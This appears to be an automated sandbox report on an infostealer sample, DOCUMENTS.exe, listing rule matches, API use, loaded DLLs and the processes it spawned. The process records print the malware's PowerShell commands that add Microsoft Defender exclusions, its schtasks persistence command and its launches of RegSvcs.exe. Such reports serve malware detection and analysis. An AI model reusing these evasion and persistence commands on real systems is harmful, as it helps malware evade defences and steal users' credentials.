                      System Summary

Source: 1.2.DOCUMENTS.exe.4ab9de8.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers (Author: ditekSHen)
Source: 14.2.bgURAojpNNIb.exe.3bd6948.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers (Author: ditekSHen)
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers (Author: ditekSHen)
Source: 1.2.DOCUMENTS.exe.4a7f3c8.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers (Author: ditekSHen)
Source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers (Author: ditekSHen)
Source: 14.2.bgURAojpNNIb.exe.3bd6948.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers (Author: ditekSHen)
Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers (Author: ditekSHen)
Source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers (Author: ditekSHen)
Source: 1.2.DOCUMENTS.exe.4a7f3c8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers (Author: ditekSHen)
Source: 1.2.DOCUMENTS.exe.2d92488.0.raw.unpack, SQL.cs | Large array initialization: array initializer size 33608
Source: 1.2.DOCUMENTS.exe.6f20000.5.raw.unpack, SQL.cs | Large array initialization: array initializer size 33608
Source: initial sample | Static PE information: Filename: DOCUMENTS.exe
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code functions: 1_2_011BD2A4, 1_2_070D9660, 1_2_070D1330, 1_2_070D1028, 1_2_070DC610, 1_2_070D964F, 1_2_070D05E9, 1_2_070D05F8, 1_2_070D03A1, 1_2_070D03B0, 1_2_070DE150, 1_2_070DC1D8, 1_2_070D21D8, 1_2_070D21E8, 1_2_070D0006, 1_2_070D1018, 1_2_070D0040, 1_2_070DEA18, 1_2_070DEA28, 1_2_070DCA48, 1_2_070D396F, 1_2_070D3997, 1_2_070D39A8, 1_2_070D59A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code functions: 13_2_015896E0, 13_2_01589B30, 13_2_01584A98, 13_2_0158CFA0, 13_2_01583E80, 13_2_015841C8, 13_2_066956D0, 13_2_06693F48, 13_2_0669BCF8, 13_2_06698DCD, 13_2_06692AF0, 13_2_06699AD8, 13_2_06690040, 13_2_06694FF0, 13_2_06693233
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Code functions: 14_2_029DD2A4, 14_2_05107F10, 14_2_05100007, 14_2_05100040, 14_2_05107F03, 14_2_07149650, 14_2_071413C0, 14_2_071410B8, 14_2_0714C730, 14_2_0714963F, 14_2_07140679, 14_2_07140688, 14_2_07140430, 14_2_07140440, 14_2_0714E270, 14_2_0714C2F8, 14_2_071410A8, 14_2_071400C0, 14_2_0714EB48, 14_2_0714CB68, 14_2_0714395F, 14_2_07143998, 14_2_07143988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code functions: 18_2_010A9378, 18_2_010A9B30, 18_2_010A4A98, 18_2_010ACFA0, 18_2_010A3E80, 18_2_010A41C8, 18_2_05F7DDE0, 18_2_05F78DCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F7BCF818_2_05F7BCF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F73F4818_2_05F73F48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F756D018_2_05F756D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F7004018_2_05F70040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F72AF018_2_05F72AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F79AD818_2_05F79AD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F74FF018_2_05F74FF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F7324818_2_05F73248
                      Source: DOCUMENTS.exe, 00000001.00000002.1359470128.000000000471E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1357702369.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1355341086.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1362445020.0000000006F20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1363499261.000000000B0F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1357702369.0000000003040000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5f802f13-29d4-4509-bfb2-5fd9776e9980.exe4 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5f802f13-29d4-4509-bfb2-5fd9776e9980.exe4 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exeBinary or memory string: OriginalFilenameerOG.exe6 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 14.2.bgURAojpNNIb.exe.3bd6948.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.DOCUMENTS.exe.4a7f3c8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 14.2.bgURAojpNNIb.exe.3bd6948.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.DOCUMENTS.exe.4a7f3c8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: DOCUMENTS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: bgURAojpNNIb.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, ekKu0.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, vKf1z6NvS.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, ZNAvlD7qmXc.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, U2doU2.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, BgffYko.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, HrTdA63.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, oDEPGtaZ6ry5IcnYBf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, oDEPGtaZ6ry5IcnYBf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.AddAccessRule
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.AddAccessRule
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.AddAccessRule
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, oDEPGtaZ6ry5IcnYBf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@1/1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMutant created: \Sessions\1\BaseNamedObjects\BgVdziomRLhuPfWnKtoTxhmOv
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1DED.tmpJump to behavior
                      Source: DOCUMENTS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: DOCUMENTS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: DOCUMENTS.exeReversingLabs: Detection: 44%
                      Source: DOCUMENTS.exeVirustotal: Detection: 35%
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile read: C:\Users\user\Desktop\DOCUMENTS.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\DOCUMENTS.exe "C:\Users\user\Desktop\DOCUMENTS.exe"
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
